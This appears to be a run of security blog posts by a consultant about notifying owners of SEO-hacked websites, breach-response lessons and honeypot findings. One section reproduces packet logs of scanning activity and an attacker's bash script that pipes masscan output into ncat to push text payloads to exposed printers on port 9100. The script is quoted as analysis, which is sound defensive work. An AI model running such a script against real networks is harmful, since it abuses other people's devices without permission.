For some time now, I’ve been writing about a New Year’s resolution I made to find and notify at least one organization per day about their compromised web servers in 2025. In my last update, I had just notified the 365th site, back on the 261st day of 2025. That completed my goal - I’d notified one site for every day of the year.

Goal accomplished! Was it time to kick back and relax?

Nope!

It’s now day 271, and I’ve just sent notification number 400.

Over the course of the year, the landscape hasn’t changed much. The internet remains a target-rich environment, and identifying compromised systems remains alarmingly simple. The path of least resistance is still a four-lane highway paved with outdated plugins and neglected content management systems.

The “Million-Dollar” Couch Project

When I wrote the last post, I threw out some conservative financial impact estimates. Now, with 400 organizations notified, we’ve crossed the $1,000,000 mark as a median potential financial impact. All from a retired guy on his couch using Google. It’s a number that feels both significant and deeply concerning. It illustrates the scale of the problem and how a modest amount of pro-bono effort can go a very long way.

The Human Element: The Good, The Bad, and The Confused

The biggest lesson from these last notifications hasn’t been technical. It’s been about the human response. When you tell someone their fly is open, you get a range of reactions. It’s no different in the digital world.

• The Grateful: The vast majority of people I hear from are appreciative. They’re small business owners who are stretched thin and simply didn’t know. They are thankful for the quiet, non-judgmental heads-up. These are the responses that make the project worthwhile.

• The Suspicious: A fair number of people are immediately suspicious. “How do I know you’re not the hacker?” It’s a valid question in a world full of scams. It highlights the trust deficit that exists online and makes clear communication absolutely critical. I’ve learned to be patient and provide as much verifiable, non-threatening information as possible.

• The Silent: And then there are the silent ones - this is the VAST majority of folks I contact. Emails go into a void, contact forms are submitted with no reply. Oftentimes, the site gets silently cleaned up. Sometimes the site remains compromised. This is the most frustrating part. You can lead a horse to water, but you can’t make it patch its WordPress installation.

Why Is This Still So Hard?

The core challenge remains what it was on day one: contact. Finding the right person to receive a security notification is often more challenging than identifying the vulnerability itself. The absence of a simple security.txt file on most websites turns a 5-minute task into a 30-minute investigation. For a business, this is a critical, and easily fixable, blind spot.

This project continues to be a poignant reminder of the vast gap between the technical reality of cybersecurity and the day-to-day reality faced by individuals running businesses online. We’ve got to do better at bridging that gap.

On to notification 500!

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 3, 2025

Today, September 18, 2025, is the 261st day of 2025, but for me, it’s December 31.

For anyone who’s been following my journey to accomplish my New Year’s Resolution, that statement might make sense. Today, I contacted my 365th organization, informing them that their web server has been compromised and is serving questionable content. My goal to identify one hacked system and notify its owner for each day in 2025 is complete.

Based on calculations performed by an AI, a reasonably conservative estimate of the financial impact of this adventure lies somewhere between $547,500.00 and $1,104,125.00.

Not too bad for some old, retired dude sitting on his couch.

What sort of exotic tools allowed me to have that impact? Google.

Yep, Google.

You see, the vast majority of the organizations I contacted had their web servers hacked by scammy folks trying to boost their search engine placement - all to sell more supplements, Roblox hacks, TikTok follower generators, ways to see private Instagram accounts, or tools to generate AI porn.

Pretty seedy stuff that no one wants associated with their organization.

Suppose you know what vulnerabilities the SEO hackers are using to add new pages to sites (and therefore, where those pages will land). Suppose you also know the verbiage they’re using to seed their campaigns to search engines.

It becomes remarkably easy to find hacked websites on Google.

Then you face your next problem: finding someone to tell.

Suppose someone places new, inappropriate pages on your website, and you’re not watching your web server logs closely enough to see those pages being served. Do you also monitor your feedback forms or general email address for security incident reports from some crazy old guy on his couch?

I’m going to say, “No.”

I did my best to get their attention. In some cases, I’ve even resorted to narking to financial industry regulators to get something done. I estimate that between 60%-80% of the sites have been cleaned, and I’ll go back through my list and keep trying on the rest.

It’s exhausting.

I’m going to wrap up this little project by preaching to the choir, telling the absolutely wrong people the right information:

• Monitor your web server logs. If you see a page being served that you don’t recognize, investigate.

• Publish a “security.txt” file on your website (see RFC-9116) and monitor the contact address (out of 365 organizations, 3 had a “security.txt” file; I almost fainted when I saw one).

But you knew all of that, didn’t you?

And, just because:

We’ll Drink A Cup of Kindness Yet,
for Auld Lang Syne…

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 3, 2025

The bulk of these compromised systems are the organization’s web servers, and these tend to host new, unlinked pages that advertise questionable content.

At the beginning of the year, on a whim, I decided to make a New Year’s resolution: attempt to find at least one compromised system and contact the owner every day in 2025. At this point, I’m more than a bit surprised at how easy the “finding” part has been.

All of this has prompted me to reflect on the overall impact of my New Year’s resolution.

Because the bulk of the notifications I’ve sent have been “SEO-hack” related, just how much is it worth to an organization to have someone notify them that their website is hosting pages advertising “XXX videos,” “reviews” of herbal supplements (that are ads), or links to “Free Robux/Walmart gift card/V-Bucks/TikTok followers” generators.

$10? $50? $100? $1000?

What is it worth to be able to remove a potential source of reputational harm? What is the value of someone quietly telling you that your website is advertising something skeevy?

If I were to place a value on the potential reputational harm, I think my current 170 notifications are probably worth somewhere north of $100,000.

But that’s just me.

Maybe I’m trying to make myself feel good.

And I do.

It’s not so much about the dollar value of my 2025 hack notifications.

I hate bullies.

There are all kinds of bullying. Physical intimidation. Mental cruelty.

One of the earliest drivers pushing me to work in Security was this: I hate it when smart people use their intelligence to take advantage of others. It’s precisely like someone using their physical stature or prowess to bully a smaller or less athletic person.

These 170 notifications mean more to me than a dollar value can represent.

Each one represents a little justice.

And you can’t put a dollar value on that.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 3, 2025

Some people collect coins, and some collect stamps. I spend some of my free time each week looking for hacked systems on the Internet.

Hey… it's a hobby.

Last week, my wife and I were sitting at breakfast with our financial advisor for a quarterly meeting when my cell phone rang. The caller ID indicated an acronym that seemed familiar, so I excused myself and answered the call.

The caller quickly explained that he was calling in response to an email I'd sent the day before outlining some facts that led me to believe that someone had compromised their organization's website. In the email, I made recommendations for the next steps, but he was calling to request additional assistance—what my friend Ed Skoudis used to refer to as the vortex of free consulting. I did my best to give him some quick pointers without being sucked into indentured servitude.

After I hung up the call, I started thinking about providing something more—some kind of documentation for how to move forward when you learn you've been breached. This post is the result of that thinking.

One of my New Year's resolutions for 2025 is to identify and notify one organization each day that they are compromised. So far, I'm ahead of schedule—today is day 127 and I’ve notified 130. This experience highlights a more uncommon scenario: an organization first learns of a breach not from its sophisticated internal tools but from an external party.

I aim to explore what organizations should learn when someone without internal access (no logs, no monitoring dashboards) finds evidence of a compromise. How should this specific type of discovery prompt deeper changes to their security posture?

An external notification isn't just another security ticket. It signifies that all internal defenses and detection mechanisms failed to notice an active compromise. Unlike an internal alert (which shows your security monitoring worked), an external notification proves that:

1. Someone bypassed preventative controls (firewalls, patching, hardening).
2. Detection controls (IDS/IPS, log monitoring, file integrity checks, security scans) either weren't in place, were misconfigured, or didn't cover the specific attack vector or compromised asset.
3. Monitoring was insufficient to spot the symptoms of the breach (e.g., strange website behavior, blocklisting, unusual traffic).

The compromise might have existed for days, weeks, or even months before external detection. The longer the dwell time, the greater the potential damage.

Key Lessons Organizations Should Learn From An External Breach Notification

Lesson 1: Your Detection Capabilities Are Insufficient.

Problem: Your current security stack (WAF, IDS/IPS, AV, EDR, SIEM) didn't catch the active breach.

Actionable Insight: Don't just fix the specific vulnerability. Ask why it wasn't detected. Review tool configurations, rule sets, and coverage. Are you monitoring the right things? Are alerts being generated but ignored (alert fatigue)? Consider implementing or enhancing technologies like File Integrity Monitoring (FIM), external website scanning, and ensuring logs capture meaningful events.

Lesson 2: Monitoring Needs Broader Scope & Depth.

Problem: Both the entry into your system and the activity or outcome of the compromise (e.g., defaced page, malicious redirect, server sending spam) weren't flagged internally.

Actionable Insight: Expand monitoring beyond basic server health. Monitor website content changes, DNS records, SSL certificate validity, outbound traffic patterns, and public blocklists. Implement comprehensive logging across web servers, databases, OS, and applications, and ensure these logs are analyzed, not just stored.

Lesson 3: Prevention Strategies Need Re-evaluation.

Problem: Someone successfully exploited a vulnerability, or credentials were compromised.

Actionable Insight: This goes beyond just patching the exploited flaw. Review your entire vulnerability management program (scanning frequency, patching SLAs). Assess web application security practices (secure coding, input validation). Re-evaluate access controls, password policies, and the implementation of Multi-Factor Authentication (MFA) everywhere possible. Harden systems based on security benchmarks.

Lesson 4: Incident Response Plans Must Account for External Input.

Problem: How did the organization react to an external notification? Was there a straightforward process? Was it efficient?

Actionable Insight: Review or create an Incident Response (IR) plan. Does it include steps for validating and acting upon external reports? Who is responsible? How quickly can systems be isolated, analyzed, and restored? Practice the plan (e.g., tabletop exercises), including this scenario.

Lesson 5: The "Assumed Breach" Mentality is Non-Negotiable.

Problem: Relying solely on prevention and perimeter defense creates a false sense of security.

Actionable Insight: Shift towards an "assumed breach" mindset. This means proactively hunting for threats within the network, assuming attackers may already be present. It reinforces the need for robust detection, monitoring, and response capabilities, as you can't prevent every attack.

How External Notification Should Change Security Posture & System Security

1. From Reactive to Proactive: The notification should trigger a shift from merely fixing the immediate issue to proactively improving underlying weaknesses.
2. Invest in Visibility: Prioritize tools and processes that improve visibility into system activity and potential compromises (better logging, SIEM, EDR, FIM, external monitoring).
3. Strengthen the Foundations: Double down on security fundamentals, such as timely patching, secure configurations, strong access controls, network segmentation, and user awareness training.
4. Refine Incident Response: Ensure the IR plan is robust, tested, and includes clear steps for handling external notifications efficiently and respectfully.
5. Embrace External Reporting: Please (!) create clear, easy-to-find channels for security researchers to report vulnerabilities (e.g., a security.txt file with a dedicated security email address). Treat these reports seriously and thankfully. Lashing out at the person notifying you is truly bad form. Don't do it.

In Summary…

Finally, I acknowledge that receiving a notification from an unrelated third party that someone has compromised your organization is a humbling experience.

You missed something. You may have missed several things.

Rather than taking it as a defeat, using it as a learning experience is the best way to move forward and improve.

And isn't that really what we all want to do?

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
May 7, 2025

P.S.: I briefly considered adding a link to this blog post to my standard report language. Unfortunately, the uh… rather interesting name of this site might make it a bit more challenging to get my messages taken seriously.

Sigh… The compromises we must make for art.

Yes, I often find vanity sites or the sites of small mom-and-pop businesses that someone has hacked. However, I’ve also found a lot of large companies—medical facilities, financial institutions, and international manufacturing businesses.

What is the takeaway here? In security, the ideal is for internal teams to detect and respond to threats swiftly and independently. However, I show up—suddenly and unannounced—uncovering an overlooked compromise. While this may initially be a very uncomfortable realization for a company, leveraging this as a learning opportunity is essential.

Lessons Learned—Introspection And Humility:

Recognizing that an outsider discovered a compromise is a stark reminder that no organization is infallible. Companies must approach this revelation with humility and openness. Acknowledging that a gap exists is the first step toward improving security protocols.

Why was the breach not detected internally? Analyzing this should uncover weaknesses in current monitoring and alert systems. Reassess the tools and processes for monitoring your network traffic, log analysis, and anomaly detection.

A breach is often the result of human error or outdated knowledge. Regular training and up-to-date threat intelligence can help your staff to recognize and respond to potential threats more effectively. Many of the searches I perform target specific, known web vulnerabilities—your team SHOULD catch these if they target systems or software you use. If they didn’t, perhaps this indicates a training deficiency.

Conduct frequent third-party security audits to obtain an unbiased assessment of your cybersecurity posture. These audits can emulate the outsider perspective and highlight areas of vulnerability before attackers can exploit them.

The experience of learning about a breach from an external source should be a catalyst for change within an organization. It underscores the need for a dynamic, robust, continually evolving cybersecurity strategy. Addressing the gaps that allow an outsider to highlight your vulnerabilities before your team finds them should transform a potentially damaging event into a stepping stone to improvement.

The ability to adapt and learn from any source—internal or external—is the hallmark of a truly secure organization. By embracing the lessons an external discovery provides, companies protect themselves from future threats and cultivate an environment of continuous improvement and vigilance.

One final note: Always say “thank you” to the person who tells you you’re hacked. I know one guy who really appreciates it.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
December 10, 2024

I’ve talked about it on LinkedIn and publicly called them out on this issue.

The U.S. Department of Commerce and Tyler Data & Insights still have a website chock full of pages used to boost SEO for online no-prescription-needed pharma.

I may be too harsh. Addressing this issue must be much more complicated than I imagined.

I decided to examine the website more closely to get a better idea of what was going on.

The website in question is here.

When the page loads, I see a button at the top promising improved experience and performance. “Improved” is a no-brainer, so I click through to see the results. (I applaud any attempt at improvement—good on you, random government web developer.)

Let’s look at what they describe as the “new Catalog experience,” shall we?

I’m excited. Are you excited?

(Note: I am a bit concerned about the odd capitalization of Catalog. Is that necessary? But still, I’m excited.)

My first thought on why removing the pharma-SEO pages was complicated was that they were just tiny bits of chaff found scattered amid a plethora of wheat. Someone has put great effort into optimizing this page; it says so at the top. These changes must’ve been necessary to allow us to search through an enormous data catalog (uh… sorry… Catalog), of which the un-cleverly disguised fake datasets cum pharma-SEO is a minuscule portion.

Wait.

What’s that I see?

With no search filters, the search page returns ninety-eight results.

Only ninety-eight datasets?

It’s not my place to question what someone chooses to improve and optimize, but really? This site?

Wait. Let’s see how much chaff there is when compared to the wheat.

There are only ninety-eight datasets. I can do this by hand.

After clicking through an exhausting ten pages of results (with a break for some water—always stay hydrated), I counted thirty-one bogus pages (Twenty-nine selling no-prescription pharma, one selling a V-Bucks generator, and a test page—aren’t scammers just so frickin’ cute when they act all business-like and test stuff?).

Thirty-one out of ninety-eight.

I have a fascinating idea that can improve and optimize this website by 31.6%. Best of all, it doesn’t require any changes to the website code.

Can you guess what it is?

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
November 10, 2024

P.S.: The issues listed in this blog entry were current as of the date this was published, November 10th, 2024. I sincerely hope they won’t exist for long.

While my primary goal is to alert these organizations so they can secure their systems, reaching the right people can be challenging. Some folks have suggested I publicly name these compromised organizations because it might spur them into action. However, this approach has significant pros and cons that need careful consideration.

In many ways, this debate mirrors the ongoing discussion over the public disclosure of security vulnerabilities. Like that debate, different individuals will likely agree with different sides of this question; I’m not attempting to settle this debate but rather to clarify the pros and cons of the issue.

Pros of Public Disclosure

Let’s get this one out of the way first: It’s much easier. Finding a way to notify an organization that they’ve been hacked is hard. I’ve tried everything from website Contact Us forms to messages on Twitter and LinkedIn to phone calls. Few organizations have a working security@ email address, and most folks likely consider my messages spam. No one likes hearing that they made a mistake; that’s essentially what I’m doing. Rightfully, they are suspicious of someone outside their organization telling them something they should’ve caught themselves. All of that works against me when I attempt to quietly inform an organization that they’ve been hacked.

Another advantage of publicly naming compromised organizations is the potential to create urgency. When a breach is made public, it often garners immediate attention from the organization, prompting them to address the issue more swiftly than they might have otherwise. Publicly naming compromised organizations can lead to quicker mitigation of vulnerabilities, reducing the risk of further exploitation. Additionally, public disclosure can raise awareness about common security issues, encouraging other organizations to check and secure their systems proactively.

Public disclosure could also foster a culture of accountability. By highlighting security lapses, organizations may feel more compelled to invest in robust security measures and prioritize cybersecurity as a critical aspect of their operations. If the potential for being named and shamed exists, this can lead to industry-wide improvements in security standards and practices, benefiting the broader digital ecosystem.

Cons of Public Disclosure

Despite these potential benefits, publicly naming compromised organizations carries significant risks. Chief among these is the potential for reputational damage. For instance, a small e-commerce business might lose customer trust and revenue if it’s revealed that its website was compromised. This could be particularly damaging if the breach still needs to be fully understood or contained, as it might lead to panic and misinformation. Attackers have already violated these organizations; publicly shaming them would only add to that violation.

Public disclosure of compromised systems can unintentionally benefit malicious actors. Remember, I don’t have some magic crystal ball. I’m using publicly available information to discover hacked organizations. Even if I don’t reveal a compromised system’s specific weaknesses, attackers may use this same public information to identify weaknesses and escalate their attacks before the organization can address them. This could worsen the situation, potentially resulting in more significant breaches and greater data loss.

My Approach

As I said at the beginning of this post, this isn’t a debate with some easy, clear-cut answer. It all comes down to what you’re personally comfortable doing.

For better or worse, I find myself uncomfortable with publicly naming victims. Organizations should absolutely be more vigilant in patching, monitoring, and securing their systems. As an outsider, I should never be the one telling a business that someone has hacked its systems. As my college roommate used to say, “They done brang it on themselves.”

But they’re still victims.

Leaving the doors to your house standing open is dumb, but it doesn’t give someone the right to steal your stuff. If they do, you’re still a victim, and we should be cautious of falling into the trap of victim-blaming.

Given the complexity of these considerations, I’ll continue down the path I’m currently following. I’ll continue to do my best to notify organizations that attackers have compromised their systems without resorting to public shaming.

Even though this philosophical excursion hasn’t changed my mind, I’m happy to have taken it. This isn’t a black-and-white issue; it’s a decision informed by subjective values. Sometimes, it is important to think things through, if only to clarify your reasoning and strengthen your resolve.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
October 29, 2024

A friend proposed a thought experiment a while back: What if we could simultaneously listen on all IP ports and protocols? What would we see? What if we could log EVERY attack against an IP address? Exactly how bad would it be?

Well, I was able to turn that thought experiment into reality.

Imagine a tool that does the impossible—it can simultaneously listen for and complete connections on all 65,536 TCP ports, listen on all 65,536 UDP ports, grab all ICMP packets and other oddball protocols, and log everything. It doesn’t require fancy or powerful hardware - I have it running on a humble RaspberryPi 4, and it uses only 4-5% processor. This tool allows us to capture the first portion of every attack against a system, and its capabilities provide us with unprecedented insight into the ever-evolving world of network attacks.

Building this tool was no small task. The technical insanity required to bring it to life is a story for another day. Let’s talk about what it allows us to see.

First, it’s essential to set the scene. I gathered this data on a standard, unassuming home internet connection. There was nothing special, no open ports, and no services advertised to the outside world. We can consider any inbound connection attempt malicious because there is no reason for any system to connect to this address.

For the week of October 6th through October 12th of 2024, this simple home Internet connection saw an average of 45,345 daily attacks. The attacks were relentless and steady, with the lowest day logging just over 43,000 and the highest day at around 49,000. This data underscores the urgency and importance of our work in understanding and mitigating network attacks.

For completeness, I also saw four IP-in-IP packets (IP Protocol 4) and eight GRE packets (IP Protocol 47).

Remember, this tool shows us the first portion of the attack so we can often identify what service it targets, even if it is against a non-standard port. So, out of 317,417 attacks during that week, 25,640 were attempts to exploit Microsoft RDP, but not just on port 3389. I can confidently say that attacks sourcing from 736 unique IPs made RDP exploit attempts against 12,312 different ports.

Because we can see the inbound attack, we can fingerprint the attacker’s tooling and identify IP addresses used in coordination. Because of this tool’s unique visibility, we can even recognize multiple IP addresses performing a coordinated scan across a range of ports.

You knew it was bad out there - now we can know just how bad.

This tool isn’t publicly available right now, as the techniques I used to create it are being patented. But if you’re interested in using it for research, reach out, and we can talk.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
October 22, 2024

P.S.: Just to add some additional context, that averages out to an attack every 1.9 seconds, all day, every day.

During that week, attacks targeted 30,194 unique ports, were 99.66% TCP, and sourced from 15,681 unique IP addresses.

Rather than choosing a standard answer like phishing or ransomware, I’ll say something completely different: people who think they know more than they do.

I’ve run into that several times lately.

As many of you know, I use some Google-fu each week to find compromised websites and try to contact the organizations to let them know so the owners can clean up their sites.

Recently, I tried contacting the owners of a compromised website through LinkedIn. After sending them several messages, they finally responded that they had “run numerous cybersecurity scans and found no threats.” I replied with a list of multiple URLs, leading to pages attackers added to their site.

All the pages added to their site suddenly disappeared, and I heard nothing else back.

Today, after exhausting multiple methods of contacting a different organization, I finally decided to give them a call. I don’t particularly enjoy calling people because it rarely ends well, but I was determined to get through to them.

I spoke to the receptionist and asked to speak with someone in charge of their website. She transferred me to a gentleman, and I explained that I was a security researcher who had noticed their site was compromised while investigating other hacked sites. He immediately got defensive.

I explained that attackers had added pages to their site advertising questionable things. “Like what?” he asked. I explained that the added pages advertised techniques for viewing private Instagram profiles, among other things.

I asked him if he could look at something in a web browser, preparing to give him a Google search string. He explained that he was “looking at the site right now” and saw nothing wrong. I explained that the attack was different from what he would see on the main site because attackers had added unlinked pages.

Then he hung up.

If you think you understand more about website security than you do, you’ll likely miss many things, like the fact that most website hacks aren’t easily visible. In this case, the attackers wanted these new pages to hang around as long as possible to get the SEO bump associated with having links on a popular web page. Of course, they won’t make it easy to spot the hack!

If you work in a small- to medium-sized business, you have so much on your plate that you can’t be an expert in everything. If someone contacts your company and tells you someone has hacked your organization, listen. Be skeptical—I would never say otherwise, but please listen.

You might find out something important.

You might find out that someone has hacked your website.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
October 22, 2024

First of all, children, we were using the term “crypto” for “cryptography” back when most of you were still pooping yellow, so please stop trying to co-opt that phraseology for your wasteful toy currency and push yourselves to use the entire word, “cryptocurrency.” I’m sure you can somehow muddle through.

Secondly, stop acting like your hobby is God’s gift to the world and not the frickin’ pyramid scheme that it obviously is.

Finally, your “let the world burn” attitude when it comes to your altcoins, NFTs, and every other freakishly stupid waste of power that you can come up with, has seeped into the Internet Menaces that have appeared like ticks on the bloated carcass you’ve become. That kinda pisses me off…

To whit, I was blessed with the following garbage hitting on 56,855 different TCP ports earlier today:

Jan  7 20:08:13 sensor: PacketTime:2022-01-07 20:08:13.113250 Len:237 IPv4/TCP 217.12.218.106:59524 -> 52018 ID:61018 TOS:0x28, TTL:46 IpLen:20 DgLen:223 *AP*** Seq:0xe2801897 Ack:0x2ca8a49e Win:0xfaf0 TcpLen:20 Resp:A
00000000  50 4f 53 54 20 2f 20 48 - 54 54 50 2f 31 2e 31 0d  |POST / HTTP/1.1.|
00000010  0a 48 6f 73 74 3a 20 61 - 61 61 2e 62 62 62 2e 63  |.Host: aaa.bbb.c|
00000020  63 63 2e 64 64 64 3a 35 - 32 30 31 38 0d 0a 41 63  |cc.ddd:52018..Ac|
00000030  63 65 70 74 3a 20 2a 2f - 2a 0d 0a 41 63 63 65 70  |cept: */*..Accep|
00000040  74 2d 45 6e 63 6f 64 69 - 6e 67 3a 20 67 7a 69 70  |t-Encoding: gzip|
00000050  2c 20 64 65 66 6c 61 74 - 65 0d 0a 55 73 65 72 2d  |, deflate..User-|
00000060  41 67 65 6e 74 3a 20 50 - 79 74 68 6f 6e 2f 33 2e  |Agent: Python/3.|
00000070  38 20 61 69 6f 68 74 74 - 70 2f 33 2e 36 2e 33 0d  |8 aiohttp/3.6.3.|
00000080  0a 43 6f 6e 74 65 6e 74 - 2d 4c 65 6e 67 74 68 3a  |.Content-Length:|
00000090  20 36 37 0d 0a 43 6f 6e - 74 65 6e 74 2d 54 79 70  | 67..Content-Typ|
000000a0  65 3a 20 61 70 70 6c 69 - 63 61 74 69 6f 6e 2f 6a  |e: application/j|
000000b0  73 6f 6e 0d 0a 0d 0a    -                          |son....         |
Jan  7 20:08:13 sensor: PacketTime:2022-01-07 20:08:13.115311 Len:121 IPv4/TCP 217.12.218.106:59524 -> 52018 ID:61019 TOS:0x28, TTL:46 IpLen:20 DgLen:107 *AP*** Seq:0xe280194e Ack:0x2ca8a49e Win:0xfaf0 TcpLen:20 Resp:A
00000000  7b 22 6a 73 6f 6e 72 70 - 63 22 3a 20 22 32 2e 30  |{"jsonrpc": "2.0|
00000010  22 2c 20 22 6d 65 74 68 - 6f 64 22 3a 20 22 6e 65  |", "method": "ne|
00000020  74 5f 76 65 72 73 69 6f - 6e 22 2c 20 22 70 61 72  |t_version", "par|
00000030  61 6d 73 22 3a 20 5b 5d - 2c 20 22 69 64 22 3a 20  |ams": [], "id": |
00000040  36 37 7d                -                          |67}             |

Seriously?!?

You’re that hard up that you need to scan 56,855 different ports to see if you can find an Ethereum mining rig so you can try to scam some Ether? You’re talented enough that you can write a scanner using an asynchronous Python HTTP library, and this is how you use your brain?

Ethereum bro, go home… you’re drunk.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
January 7, 2022

P.S.: And to the cut-rate VPS provider giving unlimited network traffic to anyone with €3.95/month (and not even pretending to monitor outbound traffic) fuck you… You’re the real problem here.

Here’s an example:

It starts with a little recon…

PacketTime:2021-12-19 04:13:06.179491 Len:60 IPv4/TCP 168.100.10.91:49260 -> 9100 ID:53613 TOS:0x0, TTL:238 IpLen:20 DgLen:40 ****S* Seq:0xb7a61da1 Ack:0x0 Win:0x400 TcpLen:20 Resp:SA
PacketTime:2021-12-19 04:13:06.389039 Len:60 IPv4/TCP 168.100.10.91:49260 -> 9100 ID:0 TOS:0x0, TTL:47 IpLen:20 DgLen:40 ***R** Seq:0xb7a61da2 Ack:0x0 Win:0x0 TcpLen:20 Resp:

The attacker, having established that there is likely a willing target printer listening (‘cause it’s talking to port 9100/TCP), slips on their faded Che Guevara t-shirt (despite the fact that they probably can’t even name three of his hit songs…) and does their best to stoke the flames of revolution:

PacketTime:2021-12-19 04:13:07.528188 Len:74 IPv4/TCP 168.100.10.91:33324 -> 9100 ID:10905 TOS:0x0, TTL:47 IpLen:20 DgLen:60 ****S* Seq:0x812f4896 Ack:0x0 Win:0xfaf0 TcpLen:40 Resp:SA
PacketTime:2021-12-19 04:13:07.653741 Len:60 IPv4/TCP 168.100.10.91:33324 -> 9100 ID:10906 TOS:0x0, TTL:47 IpLen:20 DgLen:40 *A**** Seq:0x812f4897 Ack:0x93d71e15 Win:0xfaf0 TcpLen:20 Resp:
PacketTime:2021-12-19 04:13:07.653893 Len:293 IPv4/TCP 168.100.10.91:33324 -> 9100 ID:10907 TOS:0x0, TTL:47 IpLen:20 DgLen:279 *AP*** Seq:0x812f4897 Ack:0x93d71e15 Win:0xfaf0 TcpLen:20 Resp:A
00000000  0d 0a 0d 0a 3d 3d 3d 3d - 3d 3d 3d 3d 3d 3d 3d 3d  |....============|
00000010  3d 3d 3d 3d 3d 3d 3d 3d - 3d 3d 0d 0a 4e 45 57 20  |==========..NEW |
00000020  59 45 41 52 27 53 20 52 - 45 53 4f 4c 55 54 49 4f  |YEAR'S RESOLUTIO|
00000030  4e 53 0d 0a 3d 3d 3d 3d - 3d 3d 3d 3d 3d 3d 3d 3d  |NS..============|
00000040  3d 3d 3d 3d 3d 3d 3d 3d - 3d 3d 0d 0a 0d 0a 31 2e  |==========....1.|
00000050  20 48 69 74 20 74 68 65 - 20 47 79 6d 0d 0a 32 2e  | Hit the Gym..2.|
00000060  20 44 65 6c 65 74 65 20 - 46 61 63 65 62 6f 6f 6b  | Delete Facebook|
00000070  0d 0a 33 2e 20 4f 52 47 - 41 4e 49 5a 45 20 41 20  |..3. ORGANIZE A |
00000080  55 4e 49 4f 4e 0d 0a 0d - 0a 0d 0a 4c 65 61 72 6e  |UNION......Learn|
00000090  20 4d 6f 72 65 3a 0d 0a - 3d 3d 3d 3d 3d 3d 3d 3d  | More:..========|
000000a0  3d 3d 3d 3d 3d 3d 3d 3d - 3d 3d 3d 3d 3d 0d 0a 72  |=============..r|
000000b0  65 64 64 69 74 2e 63 6f - 6d 2f 72 2f 61 6e 74 69  |eddit.com/r/anti|
000000c0  77 6f 72 6b 0d 0a 3d 3d - 3d 3d 3d 3d 3d 3d 3d 3d  |work..==========|
000000d0  3d 3d 3d 3d 3d 3d 3d 3d - 3d 3d 3d 0d 0a 0d 0a 0d  |===========.....|
000000e0  0a 0d 0a 0d 0a 0d 0a 0d - 0a 0d 0a 0d 0a 0d 0a     |............... |
PacketTime:2021-12-19 04:13:07.654029 Len:60 IPv4/TCP 168.100.10.91:33324 -> 9100 ID:10908 TOS:0x0, TTL:47 IpLen:20 DgLen:40 *A***F Seq:0x812f4986 Ack:0x93d71e15 Win:0xfaf0 TcpLen:20 Resp:FA
PacketTime:2021-12-19 04:13:07.771993 Len:60 IPv4/TCP 168.100.10.91:33324 -> 9100 ID:10909 TOS:0x0, TTL:47 IpLen:20 DgLen:40 *A**** Seq:0x812f4987 Ack:0x93d71e16 Win:0xfaef TcpLen:20 Resp:

Ok.

So maybe “stokes the flames of revolution” is a bit of an overstatement.

A wannabe revolutionary lazily slings TCP packets into the aether in hopes of… getting someone to read Reddit

Nah.

A basement-dwelling socialist poser sticks it to the capitalist oligarchy and exploits the tools of production to… well… print something.

Oh, nevermind.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
December 19, 2021

Addendum: So apparently, masscan and netcat are the tools of the revolution (who knew?). A little recon uncovered that the following script was running the show:

#!/bin/bash
while true
do

  masscan --conf masscan.conf 2>/dev/null | \
  while read line
  do
    cat "$(ls payload/*.txt | shuf -n 1)" | ncat -v -C -i 10 -w 10 $(echo "$line" | awk '{ print $6 }') 9100 &
  done

done

The payload directory contained an assortment of messages like the one above.

Over the summer, my mom began exhibiting symptoms of dementia. She had been misremembering little things, repeating herself, losing items - but this was different.

One day, she called my brother in a panic. She didn’t know where she was.

She was calling from home.

Thus began a sad and difficult journey. My mom is currently in a long-term memory care facility.

Fully lucid moments are becoming rarer. Dementia is an evil disease that robs you of the people you love - replacing them with a look-alike who has their memories all jumbled together in a big pile. Dementia manifests its particular brand of cruelty by letting you see glimpses of normalcy amid the confusion. It’s a horrible disease.

And, if I’m being honest, it is especially cruel because - for me - every visit triggers what I’ve admitted is my greatest fear.

As I said, the last few months have been challenging.

But there are bright spots - even in the darkest times. And generally, they find a way of showing up both unexpectedly and just when you need them.

One of those bright spots was a card sent several months “late,” yet arriving right on time yesterday. It’s funny how things like that seem to happen. So never worry about sending someone a belated card - because often, it will arrive when it’s needed the most.

The other bright spot needs a little explaining.

Those of you who know me personally will likely be shocked by this: I was a bit of a brat as a child.

I know, I know - it’s hard to believe.

My mom had a lot of little holiday decorations that got trotted out every year. My favorites were three sets of candle holders. It wasn’t that I was into holiday candle holders - I liked them because of the opportunity they presented.

You see, the three sets of candle holders were separate letters that each spelled out a word: SANTA, SNOW, and NOEL.

In case your anagram-fu is a little rusty, let me (literally) spell it out for you. Young Tom delighted in rearranging the letters to spell out that wonderful holiday phrase: SATAN OWNS LEON.

When we moved my mom into memory care, we took along several items of furniture, some pictures, and some knick-knacks so it would feel more like home. Then, whatever couldn’t go with her, we allowed children, grandchildren, and great-grandchildren to divide up. Unfortunately, I’d forgotten about one item that I had taken in all of the chaos and rush.

